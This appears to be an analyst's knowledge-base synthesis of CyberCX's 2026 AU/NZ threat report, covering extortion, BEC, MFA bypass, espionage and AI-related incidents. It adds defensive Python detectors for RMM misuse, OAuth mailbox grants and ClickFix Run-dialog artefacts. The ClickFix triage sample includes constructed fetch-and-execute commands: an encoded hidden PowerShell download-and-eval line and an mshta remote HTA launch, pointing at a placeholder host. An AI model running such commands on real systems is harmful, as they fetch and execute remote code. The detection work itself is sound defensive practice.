CyberCX 2026 Threat Report — Synthesis
Source: CyberCX, 2026 Threat Report (annual DFIR retrospective covering calendar-year 2025 incidents). Australia/New Zealand edition. Foreword: Hamish Krebs, Global Executive Director, Digital Forensics and Incident Response, CyberCX. Note on date: the report’s exact publication date is not pinned on the cover or in the captured text; the source_date here is the date the PDF was deposited to the Drive inbox. Note on retrieval: Drive PDF was machine-read in full via the Drive MCP. No anti-bot chain was needed.
Headline message
CyberCX’s 2026 report is the first edition in which cyber extortion overtook business email compromise (BEC) as the most common incident type (26% vs 23%), and Financial and Insurance Services overtook Healthcare as the most-impacted sector (18% vs 12%). Three structural shifts dominate the year: threat actors are starting to use generative AI offensively for the first time in CyberCX’s response data; multi-factor authentication is now being routinely bypassed via adversary-in-the-middle (AITM) session hijacking; and the economics of double-extortion are softening — many ransomware crews are no longer bothering to publish stolen data on their dedicated leak sites, with the share of non-published exfil cases rising from ~10% to ~38% year-over-year. The foreword’s framing is blunt: “The threats are bigger and better resourced, and the risks are worse than they have ever been.”
The report explicitly notes that “Generative AI was not used in the process of compiling this report,” an unusual production-disclosure for a 2026 industry publication.
Key takeouts
- Cyber extortion is now the #1 incident category at 26%, displacing BEC (23%); malware-related incidents almost doubled to 13% (from 8%), reversing several years of decline, driven primarily by ClickFix / fake-CAPTCHA social engineering pushing users to paste malicious PowerShell into the Run dialog.
- Financial and Insurance Services took the top sector slot for the first time (18%, up from ~11% in 2024); also moved into the cyber-extortion top three. Healthcare dropped to #2 (12%) but remains #1 for BEC — explained as small/medium clinics with low maturity and MSP-outsourced IT. Government remains the #1 espionage target; Education is the #1 espionage target outside government and #3 overall.
- First observed use of offensive GenAI: “For the first time, CyberCX saw threat actors using generative AI to create custom, bespoke scripts and payloads to reduce the time between initial access and achieving their objectives.” In one case the indicators included “use of emojis in the code, and tutorial-style descriptions in code comments”; the operator’s target (decrypting an internal password-manager database) was ultimately unsuccessful, but the barrier to entry has dropped.
- MFA is no longer a meaningful boundary against BEC. “Every BEC incident CyberCX responded to where traditional MFA was enforced, such as time-based one-time passwords (TOTP) or push notifications, involved session hijacking.” Phishing-as-a-service kits Tycoon and Sneaky 2FA productise AITM proxies; ~17% of 2025 BEC cases also involved attacker-registered OAuth apps (PerfectData Software, emClient, Foxmail) for persistent mailbox sync that survives password reset.
- Time-to-detect (TTD) for financially motivated incidents nearly tripled from 24 to 68 days; espionage TTD fell from 404 to 148 days. CyberCX argues part of the espionage drop reflects attackers caring less about detection — “the cyber equivalent of ‘what are you going to do about it?’” — rather than purely defender improvement.
- AI data spills appeared for the first time in CyberCX’s casebook: staff pasting sensitive corporate data into public AI portals, with no enterprise licensing, no DLP, no network logging — meaning the spill is often unquantifiable. “2025 was the first year that CyberCX’s DFIR team was engaged for these types of AI data spill incidents.”
Wider context
The report’s empirical picture backs the AU regulator narrative captured elsewhere in this KB. APRA’s 30 April 2026 letter and ASIC’s 8 May 2026 cyber letter both warn that AI-related risk is accelerating attack volume and sophistication while defensive practices lag (see 2026-05-08-apra-ai-governance). CyberCX’s 2025 incident data is precisely the kind of operational evidence those letters reference without naming — especially the Financial Services sector now being most-impacted (consistent with APRA’s “highly regulated, complex digital environments, third-party infrastructure” rationale), and AI both used by attackers and introduced as new defender liability via data spills.
The defender-side counterweight is captured in 2026-04-21-firefox-mythos-zero-days — Mozilla finding 271 vulnerabilities in Firefox via Claude Mythos Preview — but CyberCX’s report does not mention Mythos, and is silent on AI-driven defensive analysis as a control. The asymmetry is notable: a major AU/NZ DFIR practice has now seen offensive GenAI in the wild but does not yet position frontier-AI defensive analysis as table-stakes. The “use AI to scan” recommendation is present, but framed as one of nine drivers, not the keystone control.
The report is also notably silent on AU regulatory hooks. APRA, ASIC, OAIC, the Privacy Act reform, SOCI Act — none appear. The only Australian regulator the report engages is ASD via the Essential Eight, recommended as a foundational control set. For a report aimed at AU/NZ boards in 2026, that is a striking gap given how live the APRA / ASIC / OAIC overlay is for the same audience.
Section-by-section breakdown
1. Foreword (Hamish Krebs)
Sets the strategic frame. “The threats are bigger and better resourced, and the risks are worse than they have ever been.” Invokes “sophisticated state-backed prepositioning intrusions into western critical infrastructure and espionage against telecommunications networks” without naming China or Russia (outside the later ShadowPad attribution to “China’s Ministry of State Security and People’s Liberation Army”). Borrows Ciaran Martin’s “cyber thieves vs cyber thugs” distinction. Argues AI accelerates ransomware, scams, and BEC in “velocity and viciousness.”
2. Incident-type taxonomy (2025)
The 2025 distribution: cyber extortion 26%, BEC 23%, other unauthorised access 22%, malware 13%, website compromise 6%, third-party compromise 5%, data spill 3%, insider 2%.
The motivation mix: financial 59%, unknown 35% (up from 27% in 2024), espionage 4%, retaliation 2%. Unknown-motivation rise is unexplained but plausibly reflects attackers being faster to objective, leaving less behaviour to attribute.
3. Sector breakdown
| Sector | 2025 | 2024 |
|---|---|---|
| Financial & Insurance Services | 18% | ~11% |
| Healthcare | 12% | 17% |
| Education | 11% | n/a |
| Information Media & Telco | 9% | n/a |
| Manufacturing | 8% | n/a |
CyberCX’s reading of Financial Services taking #1: “high-value assets, sensitive data and time-critical operations; as well as being highly regulated. Complex digital environments, often spanning third-party infrastructure and legacy systems.” Education’s exposure: research environments, unmonitored internet-facing assets, shadow IT, student/BYOD networks, weak segmentation, and a “culture of academic freedom” that frustrates control.
4. Cyber extortion deep-dive
- Akira alone accounted for 21% of cyber extortion cases CyberCX responded to; was repeatedly the fastest group, with multiple incidents going from initial access to objective in under 24 hours, and a recorded minimum of 3 hours. Maximum observed time-to-completion: 467 days.
- At least 16 distinct extortion groups observed across CyberCX responses in 2025.
- C2-framework use is declining: Cobalt Strike-style frameworks dropped from 45% (2022) → 17% (2025), as crews shift to legitimate RMM tooling (AnyDesk, Atera, RustDesk, ScreenConnect, Splashtop) — a “living-off-trusted-tools” pattern that defeats signature-based detection.
- Initial access stays remarkably stable across years: valid accounts + external remote services (T1078 + T1133), brute force against RDP (T1110), and exploitation of public-facing applications (T1190). Note: information stealers exposed >204 million credentials globally in 2025, per CyberCX Intelligence.
- Double-extortion economics are weakening: 38% of confirmed-exfil ransomware victims were not published on a DLS at all (up from 10%), and 50% of DLS-listed non-payers had their data quietly not published (up from 24%). “Data-breach fatigue” is named as the proximate cause. CyberCX also notes several incidents where claimed exfiltrated data turned out to be “nothing more than publicly available data scraped from web portals or open APIs.”
- DLL sideloading is migrating from espionage into cyber-extortion tradecraft, used to evade EDR — an artefact of attacker professionalisation.
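Detection logic for the living-off-trusted-tools shift above, as an added example that is not from the report: it fingerprints the RMM products CyberCX names (AnyDesk, Atera, RustDesk, ScreenConnect, Splashtop) from Sysmon Event ID 1-style fields, checks them against a constructed organisational allowlist, and separately flags any RMM binary executing from a user-writable path, which is how a phishing or ClickFix payload typically drops an attacker-controlled instance. The product substrings are hints, not a signature set; the approval policy, install-path regex and sample events are all constructed for the example.

```python
"""Flag RMM tooling that is unapproved or running from user-writable paths (added example)."""
import re
from pathlib import PureWindowsPath

# Product fingerprints matched against the image name plus Sysmon Product/Description.
# Substring hints only: tune to the vendor binaries actually present in your estate.
RMM_PRODUCTS = {
    "AnyDesk": r"anydesk",
    "Atera": r"\batera",
    "RustDesk": r"rustdesk",
    "ScreenConnect": r"screenconnect|connectwise control",
    "Splashtop": r"splashtop",
}

# Locations an unprivileged user (or a payload running as one) can write to.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\users\\public\\|\\temp\\",
    re.I,
)

# Constructed org policy (hypothetical): the one sanctioned RMM and where it is installed.
APPROVED = {
    "ScreenConnect": re.compile(r"^c:\\program files( \(x86\))?\\screenconnect client", re.I),
}


def identify(event):
    """Return the RMM product an event looks like, or None."""
    hay = " ".join([PureWindowsPath(event["Image"]).name,
                    event.get("Product", ""), event.get("Description", "")]).lower()
    for product, pat in RMM_PRODUCTS.items():
        if re.search(pat, hay):
            return product
    return None


def assess(event, approved=APPROVED):
    """Reasons a process-creation event deserves attention; empty list means clean."""
    product = identify(event)
    if product is None:
        return []
    image = event["Image"]
    reasons = []
    if product not in approved:
        reasons.append(f"{product} is not an approved RMM product")
    elif not approved[product].match(image):
        reasons.append(f"{product} running outside its sanctioned install path")
    if USER_WRITABLE.search(image):
        reasons.append("binary executed from a user-writable location")
    return reasons


def detect(events, approved=APPROVED):
    """(product, image, reasons) for each suspicious event; clean events are dropped."""
    alerts = []
    for ev in events:
        reasons = assess(ev, approved)
        if reasons:
            alerts.append((identify(ev), ev["Image"], reasons))
    return alerts


# Constructed Sysmon Event ID 1-style records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "Product": "ScreenConnect", "Description": "ScreenConnect Client Service",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Users\jsmith\AppData\Local\Temp\AnyDesk.exe",
     "Product": "AnyDesk", "Description": "AnyDesk", "User": "CORP\\jsmith"},
    {"Image": r"C:\Users\jsmith\Downloads\ScreenConnect.ClientSetup.exe",
     "Product": "ScreenConnect", "Description": "ScreenConnect Client Installer",
     "User": "CORP\\jsmith"},
    {"Image": r"C:\Users\Public\rustdesk.exe", "Product": "", "Description": "",
     "User": "CORP\\jsmith"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "Product": "Microsoft Windows Operating System",
     "Description": "Host Process for Windows Services", "User": "NT AUTHORITY\\SYSTEM"},
]

if __name__ == "__main__":
    for product, image, reasons in detect(SAMPLE_EVENTS):
        print(f"{product}: {image}\n  - " + "\n  - ".join(reasons))
```

The sanctioned ScreenConnect service passes, while the same vendor's installer in a Downloads folder is flagged: a second, attacker-registered instance of an approved product is the case a plain product allowlist misses, which is why the path check runs independently of approval.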
5. Business email compromise
- BEC TTD: 30 → 20 → 12 → 19 days (2022 → 2025). Invoice-fraud cases had longest TTD (60 days); phishing-distribution cases the shortest (15).
- BEC objectives: invoice fraud 42%, additional phishing 25%, unknown 33%. Largest single BEC loss observed: “in the tens of millions.”
- The MFA-bypass observation is the cleanest “narrative break” in the report — see Key takeouts above.
- ~17% of 2025 BEC cases involved attacker-registered OAuth apps for mailbox sync — PerfectData Software, emClient, Foxmail — which persist past credential reset and password rotation; admin approval for high-risk scopes is the recommended block.
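Detection logic for the OAuth-app persistence described in Key takeouts and above, as an added example that is not from the report: it walks delegated permission grants (field names mirror Microsoft Graph's oauth2PermissionGrants: client_id, consentType, principalId and a space-separated scope string) and flags any grant holding mailbox scopes, with user-consented grants that also carry offline_access rated highest, because offline_access issues the refresh token that keeps working after the password reset. The three app display names come from the report; the client IDs, principals and the Contoso and Shared Mailbox apps are constructed placeholders.

```python
"""Audit delegated OAuth grants for mailbox-sync persistence (added example)."""
from dataclasses import dataclass, field

# Delegated scopes that let an app read, move or send mail, or keep IMAP/POP/SMTP/EWS access.
MAIL_SYNC_SCOPES = {
    "Mail.Read", "Mail.ReadBasic", "Mail.ReadWrite", "Mail.Send",
    "MailboxSettings.ReadWrite", "IMAP.AccessAsUser.All",
    "POP.AccessAsUser.All", "SMTP.Send", "EWS.AccessAsUser.All",
}
# offline_access issues a refresh token, so the grant outlives the interactive session.
PERSISTENCE_SCOPE = "offline_access"
# Display names of the mail clients the report saw attacker-registered in 2025 BEC cases.
KNOWN_ABUSED_APPS = {"PerfectData Software", "emClient", "Foxmail"}


@dataclass
class Grant:
    """One delegated permission grant; field names follow Graph oauth2PermissionGrants."""
    app_name: str
    client_id: str
    consent_type: str   # "Principal" = one user's consent, "AllPrincipals" = admin, tenant-wide
    principal_id: str
    scope: str          # space-separated delegated scopes
    granted_at: str


@dataclass
class Finding:
    app_name: str
    principal_id: str
    severity: str
    reasons: list = field(default_factory=list)


def assess_grant(grant):
    """Return a Finding for a grant that can sync or send mail, else None."""
    scopes = set(grant.scope.split())
    mail = sorted(scopes & MAIL_SYNC_SCOPES)
    reasons = []
    if mail:
        reasons.append("mail scopes: " + ", ".join(mail))
    if mail and PERSISTENCE_SCOPE in scopes:
        reasons.append("offline_access: refresh token keeps working after password reset")
    if grant.app_name in KNOWN_ABUSED_APPS:
        reasons.append("display name matches a client seen in 2025 BEC cases")
    if not reasons:
        return None
    if mail and grant.app_name in KNOWN_ABUSED_APPS:
        severity = "critical"
    elif mail and grant.consent_type == "Principal":
        severity = "high"       # user self-consented mailbox access: the AITM follow-on pattern
    else:
        severity = "medium"     # admin-consented mail access, or a name match alone: review
    return Finding(grant.app_name, grant.principal_id, severity, reasons)


def audit(grants):
    """Findings for every grant worth a look, in input order."""
    return [f for f in map(assess_grant, grants) if f is not None]


# Constructed sample export (not real tenant data); client IDs and principals are placeholders.
SAMPLE_GRANTS = [
    Grant("PerfectData Software", "00000000-0000-0000-0000-000000000001", "Principal",
          "finance.user@corp.example",
          "Mail.ReadWrite MailboxSettings.ReadWrite User.Read offline_access",
          "2025-03-04T02:11:09Z"),
    Grant("Contoso Expense Bot", "00000000-0000-0000-0000-000000000002", "AllPrincipals",
          "(all users)", "Calendars.Read User.Read", "2024-11-12T23:40:00Z"),
    Grant("emClient", "00000000-0000-0000-0000-000000000003", "Principal",
          "ops.user@corp.example", "IMAP.AccessAsUser.All SMTP.Send offline_access",
          "2025-06-18T11:02:51Z"),
    Grant("Shared Mailbox Dashboard", "00000000-0000-0000-0000-000000000004", "AllPrincipals",
          "(all users)", "Mail.Read User.Read", "2025-01-30T08:15:22Z"),
]


def audit_sample():
    return audit(SAMPLE_GRANTS)


if __name__ == "__main__":
    for f in audit_sample():
        print(f"[{f.severity}] {f.app_name} ({f.principal_id}): " + "; ".join(f.reasons))
```

On the response side, deleting the grant and the app's service principal, then calling revokeSignInSessions for the affected user, is what actually invalidates the refresh token; a password reset alone does not. The preventive control the report points at maps to the Entra user-consent setting (disallow user consent, or restrict it to verified publishers and low-impact permissions, with an admin-consent workflow for the rest).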
6. Espionage
- TTD compression is the headline (404 → 148 days). CyberCX’s interpretation: improved detection accounts for some, but actors “caring less if we do detect them” explains the rest.
- ShadowPad is the named tooling pattern — “largely privately sold, distributed and used by threat groups attributed to China’s Ministry of State Security and People’s Liberation Army” — a modular RAT with host info, file/registry, command exec, keylogging, and screen capture plugins.
- DPRK insider case study: one organisation inadvertently hired three North Korean IT workers across application development and network architecture teams. “All three company laptops were being shipped to the same address” was the only indicator. Forensics found no malicious activity; managers described them as “good at their jobs, quiet and otherwise unremarkable employees.” The laptop-farm pattern is the signature.
7. AI in the casebook
Two distinct AI surfaces appear in the 2025 data:
- Offensive (first observation): GenAI used by threat actors to write “custom, bespoke scripts and payloads” — quality described as “dubious,” indicators included emoji-in-code and tutorial-style comments, but the trend is the point, not the artefact quality.
- Defensive-liability (first observation): AI data spills as a new DFIR engagement type. The pattern: staff use external AI portals from corporate endpoints, with no enterprise licence, no DLP, no logging — making the spill unquantifiable in scope. Recommended response stack: data cleansing/labelling/governance, staff education, layered DLP (network + endpoint + data).
What the report does not cover: defensive use of frontier AI for vulnerability discovery (cf. Mozilla–Anthropic’s Firefox 150 result in 2026-04-21-firefox-mythos-zero-days); quantum computing (the word “quantum” does not appear); APRA/ASIC/OAIC obligations layered onto incident response.
8. Supply-chain and software-supply-chain incidents
- DarkEngine campaign compromised at least 2,353 unique WordPress sites via WP Engine credential phishing combined with ClickFix.
- Shai-Hulud npm worm went from v1.0 to v3.0 in 2025 — the first successful self-propagating worm in the npm ecosystem, using stolen tokens to publish infected versions of further packages. The s1ngularity/Nx, debug/chalk crypto-clipper, and eslint-config-prettier compromises sit in the same cluster. Implication: package managers are now wormable, and dependency hygiene is not a sufficient control on its own.
9. “Securing your organisation in 2026” — recommended controls
Mapped to nine drivers; key ones:
- Phishing-resistant MFA (FIDO/WebAuthn, passkeys) as the upgrade path from TOTP/push, given universal AITM bypass observed in 2025.
- Token Protection / Conditional Access to constrain session hijacking even when MFA is bypassed.
- Lock down OAuth app registration and require admin approval for high-risk scopes.
- EDR coverage and configuration discipline across the whole estate (the malware doubling is partly an EDR coverage problem).
- Application control / allowlisting to mitigate DLL sideloading.
- Disable the Run dialog via GPO, configure PowerShell execution policies, and harden browsers, specifically to defeat ClickFix. Caveat: execution policy governs script files, not inline commands, and any caller can pass -ExecutionPolicy Bypass; Microsoft documents it as a guardrail rather than a security boundary. It should back up, not substitute for, Run-dialog restriction, application control, and EDR detection of PowerShell or mshta spawned by explorer.exe.
- Dark/open-web credential monitoring with automated resets; enterprise password managers.
- Adopt the ASD Essential Eight as a baseline; NIST CSF noted as the international analogue.
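Triage of the Run-dialog artefact behind the ClickFix items in Key takeouts and the control list above, as an added example that is not from the report: ClickFix lures that paste into Win+R leave the command in the RunMRU registry key, so a DFIR check is to export that key, order the entries by MRUList (most recent first), strip the trailing \1 Explorer appends, match ClickFix patterns (hidden-window or encoded PowerShell, mshta fetching a remote HTA, LOLBin downloads), and decode any -EncodedCommand payload, which is base64 of the UTF-16LE command. The sample export and its example.invalid URLs are constructed. Variants that paste into a terminal, the PowerShell prompt or the Explorer address bar do not populate RunMRU, so a clean key is absence of evidence only.

```python
"""Triage an exported RunMRU key for ClickFix-style commands (added example)."""
import base64
import re

RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"


def _utf16_b64(text):
    # PowerShell -EncodedCommand takes base64 of the UTF-16LE command string.
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


# Constructed export of the key (not a real artefact). Explorer appends "\1" to each
# entry and keeps MRUList ordered most recent first. URLs are hypothetical.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta https://example.invalid/verify.hta\\1",
    "c": "powershell -w hidden -nop -ep bypass -e "
         + _utf16_b64("irm https://example.invalid/x | iex") + "\\1",
}

# (pattern, label); patterns are case-insensitive and deliberately broad for triage.
RULES = [
    (r"\b(powershell|pwsh)(\.exe)?\b.*(-w(indowstyle)?\s+h(idden)?|-nop\b|\biex\b"
     r"|invoke-expression|downloadstring|\birm\b|\biwr\b|frombase64string)",
     "powershell with hidden/no-profile/download/eval flags"),
    (r"\b(powershell|pwsh)(\.exe)?\b.*-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
     "powershell -EncodedCommand"),
    (r"\bmshta(\.exe)?\b\s+\S+://", "mshta loading a remote HTA"),
    (r"\b(curl|certutil|bitsadmin)(\.exe)?\b.*(://|-urlcache|/transfer)",
     "LOLBin download"),
]
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd):
    """Decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(runmru):
    """RunMRU entries most recent first, each with matched rule labels and decoded payload."""
    results = []
    for slot in runmru.get("MRUList", ""):
        raw = runmru.get(slot)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        flags = [label for pat, label in RULES if re.search(pat, cmd, re.I)]
        results.append({"slot": slot, "command": cmd, "flags": flags,
                        "decoded": decode_encoded_command(cmd)})
    return results


if __name__ == "__main__":
    print(RUNMRU_KEY)
    for entry in triage(SAMPLE_RUNMRU):
        print(f"{entry['slot']}: {entry['command'][:60]}")
        print(f"   flags: {entry['flags'] or 'none'}  decoded: {entry['decoded']}")
```

The decoded command, not the flags, is what goes in the timeline: it names the download host and tells you whether the Run entry was a first stage (fetch and eval) or the payload itself, which decides where to look next in Sysmon and proxy logs.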
Action implications / open questions
- Reset of the MFA conversation. For AU regulated entities, “MFA enforced” is no longer a credible answer to a BEC control question. Phishing-resistant MFA needs to be the asked-and-answered standard; APRA’s “preventative technical controls > policy / detective controls” critique in 2026-05-08-apra-ai-governance now has direct CyberCX-data backing.
- Sectoral implication for Financial Services boards. Most-impacted in 2025 + most-regulated for AI in 2026 (APRA letter + ASIC letter) = the strongest case yet for treating cyber and AI risk as a single integrated programme with continuous assurance, not annual penetration tests.
- AI data-spill as a category. This is the operational analogue of the APRA “use of enterprise AI tools outside approved control frameworks” gap — and at present sits below the radar of most AI policies because policy is about adoption, not staff use of free portals. DLP and AI-aware proxy/CASB controls become foundational.
- First-observed offensive GenAI deserves trend-watching, not panic. Quality was poor; the operator failed. But the trajectory is what matters: 2025 = first observation, 2026 = where? CyberCX’s “use AI scanning and run AI-specific tabletop exercises” recommendation is the right operational hook.
- The DLS economics shift may change incident-response game-theory. If roughly two in five victims with confirmed exfiltration (38%) never appear on a leak site, public-disclosure decisions (regulator notification, customer comms, ASX continuous disclosure for listed entities) can no longer be triggered by “is this on a leak site”. Internal forensic confirmation of exfiltration is now the only honest trigger.
- Open question: why no APRA / ASIC / OAIC engagement in the report? A regulator-fluent AU DFIR practice writing for AU/NZ boards should plausibly tie the operational picture to live regulatory expectations. Possible explanations: deliberate scope (report stays operational), regulatory-relations caution, or simply not the audience the report is pitched at.
- Open question: where does this report sit relative to ASD’s Annual Cyber Threat Report and CyberCX’s own STA Hack Report 2026 (already in this workspace’s Drive inbox, awaiting synthesis)? Cross-reading across all three is the next obvious analytical step and will inform whether a dedicated cyber-threat-landscape-au dossier is warranted.
Links
- Topic dossiers: ai-governance-au · ai-security-defense
- Entities: cybercx · hamish-krebs
- Related syntheses: 2026-05-08-apra-ai-governance (regulator framing this empirical picture supports) · 2026-04-21-firefox-mythos-zero-days (defender-side AI counterpart absent from this report) · 2026-05-10-vizza-chrome-silent-llm (embedded-AI supply-chain failure mode the report does not address)
- Companion source pending: CyberCX STA Hack Report 2026 (in Drive source-files/, not yet synthesised)